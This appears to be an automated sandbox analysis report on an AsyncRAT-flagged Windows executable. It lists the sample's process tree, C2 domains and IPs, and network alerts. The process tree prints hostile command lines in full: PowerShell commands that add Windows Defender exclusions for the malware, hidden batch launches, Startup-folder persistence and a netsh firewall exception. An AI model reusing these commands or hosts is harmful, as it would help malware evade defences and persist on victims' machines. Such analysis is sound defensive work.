Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 21, 2021, 12:56 p.m.	June 21, 2021, 12:59 p.m.

Size	30.8KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`34b2d327ebe6246d844b7a4b8640d4d5`
SHA256	`519ba7ae267491633e2a01e55735586ba94829871e5c4ec2fe0a5c8fafe004b8`
CRC32	`264BE501`
ssdeep	`768:JsivWH2B6fG7JJvNyWnQrbY5tfkwKw+wph:JxzBiGQBXY5tfkwKw+w`
Yara	Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description)

File.exe "C:\Users\test22\AppData\Local\Temp\File.exe"
8024
- AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  6928
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
  3916
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
  7552
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
  7076
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
  5860
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
  4104
- fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
  2224
  - AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3284
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
    2132
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
    7396
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
    4568
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
    5236
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
    8132
  - cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
    2140
    - timeout.exe timeout 1
      4680
  - fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
    8508
    - fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
      5808
      - svchost.exe C:\Windows\syswow64\svchost.exe
        6852
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
  6956
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
  8920
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
  6848
- cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
  5476
  - timeout.exe timeout 1
    6104
- File.exe "C:\Users\test22\AppData\Local\Temp\File.exe"
  2576
  - File.exe "C:\Users\test22\AppData\Local\Temp\File.exe"
    2488
    - svchost.exe C:\Windows\syswow64\svchost.exe
      6664
    - ULWTCCYCJS.exe "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe"
      8684
      - AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        5496
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
        3148
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
        236
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
        3244
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
        2696
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
        3868
      - t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
        2980
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
        6288
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
        2320
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
        784
      - cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
        4312
        
        timeout.exe timeout 1
        7544
      - ULWTCCYCJS.exe "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe"
        3472
        
        Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe" -m "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe"
        1828
        
        AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        2324
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
        5940
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
        5812
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
        1396
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
        7540
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
        4080
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
        6896
        
        timeout.exe timeout 1
        7812
        
        Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe"
        6452
    - File.exe C:\Users\test22\AppData\Local\Temp\File.exe /stext C:\Users\test22\AppData\Roaming\EWLTMYXOWI
      1132
    - File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\LOMWYOHPXP
      8384
    - SHSPFVNKVD.exe "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe"
      8548
      - AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        6116
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
        2408
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
        6684
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
        7524
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
        6584
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
        2540
      - 57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
        4376
        
        AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        1276
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
        6548
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
        4832
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        5856
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
        6208
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        3940
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
        4260
        
        timeout.exe timeout 1
        5064
        
        57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
        1048
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        5452
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
        1912
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        8844
      - cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
        4560
        
        timeout.exe timeout 1
        2608
      - SHSPFVNKVD.exe "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe"
        5484
        
        svchost.exe "C:\ProgramData\svchost.exe"
        8680
        
        AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        4920
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
        860
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
        6044
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        5772
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
        7156
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
        2356
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 1
        3008
        
        timeout.exe timeout 1
        7256
        
        svchost.exe "C:\ProgramData\svchost.exe"
        3600
        
        netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
        6384
    - File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\BIDXMHYHNV
      4408
    - File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\UOOKFMESAY
      532

Name	Response	Post-Analysis Lookup
ni2748194-1.web16.nitrado.hosting	CNAME vweb16.nitrado.hosting A 194.169.211.111	194.169.211.111
apdocroto.gq	A 104.21.14.60 A 172.67.158.27	104.21.14.60
dontreachme.duckdns.org	A 46.102.106.151	46.102.106.151
dontreachme3.ddns.net	A 95.90.186.169	95.90.186.169

IP Address	Status	Action
104.21.14.60	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
172.67.158.27	Active	Moloch
194.169.211.111	Active	Moloch
46.102.106.151	Active	Moloch
95.90.186.169	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:57660 -> 164.124.101.2:53	2025104	ET INFO DNS Query for Suspicious .gq Domain	Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 104.21.14.60:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 104.21.14.60:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49842	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49842	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49842	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 46.102.106.151:80 -> 192.168.56.102:49855	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49855	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49855	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49863 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49863 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49861	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49861	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49861	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49806 -> 104.21.14.60:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 104.21.14.60:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49853	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49853	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49853	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49823 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49873 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49873 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49874	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49874	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49874	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 46.102.106.151:80 -> 192.168.56.102:49872	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.102.106.151:80 -> 192.168.56.102:49872	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 46.102.106.151:80 -> 192.168.56.102:49872	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49823 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49823 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 194.169.211.111:80 -> 192.168.56.102:49897	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49900 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49900 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49873 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49873 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
UDP 192.168.56.102:54660 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
TCP 192.168.56.102:49913 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49913 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 194.169.211.111:80 -> 192.168.56.102:49837	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49846 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49846 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49900 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49900 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49928 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49928 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49846 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49846 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
TCP 192.168.56.102:49913 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49913 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic
UDP 192.168.56.102:61998 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity
TCP 192.168.56.102:49928 -> 172.67.158.27:80	2221034	SURICATA HTTP Request unrecognized authorization method	Generic Protocol Command Decode
TCP 192.168.56.102:49928 -> 172.67.158.27:80	2032989	ET INFO HTTP Request to a *.gq domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 273 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:57 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 85 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2021, 12:56 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:56 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
IsDebuggerPresent June 21, 2021, 12:57 p.m.			0	0
